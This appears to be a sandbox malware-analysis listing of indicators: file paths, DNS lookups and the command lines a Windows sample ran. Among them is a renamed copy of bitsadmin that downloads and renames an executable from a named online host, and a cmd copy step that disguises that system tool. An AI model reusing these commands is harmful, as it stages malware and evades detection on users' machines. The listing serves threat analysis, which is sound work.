Technical Information
- '%ALLUSERSPROFILE%\hqlhzcgin.exe' /transfer ftp /download /priority FOREGROUND https://mmdonerightcable.online/lefindora/7za.exe %APPDATA%\94-E4-\_w1.exe
- %ALLUSERSPROFILE%\hqlhzcgin.exe
- %APPDATA%\94-e4-\e3e03a2821bcadbdc326782060939364.tmp
- %LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012020112520201126\index.dat
- 'mm#####ightcable.online':443
- DNS ASK mm#####ightcable.online
- '<SYSTEM32>\cmd.exe' /C HqlhzcG /reset' (with hidden window)
- '%ALLUSERSPROFILE%\hqlhzcgin.exe' /transfer ftp /download /priority FOREGROUND https://mmdonerightcable.online/lefindora/7za.exe %APPDATA%\94-E4-\_w1.exe' (with hidden window)
- '<SYSTEM32>\getmac.exe' /fo table
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %programdata%\\HqlhzcG*.exe
- '<SYSTEM32>\cmd.exe' /C HqlhzcG /reset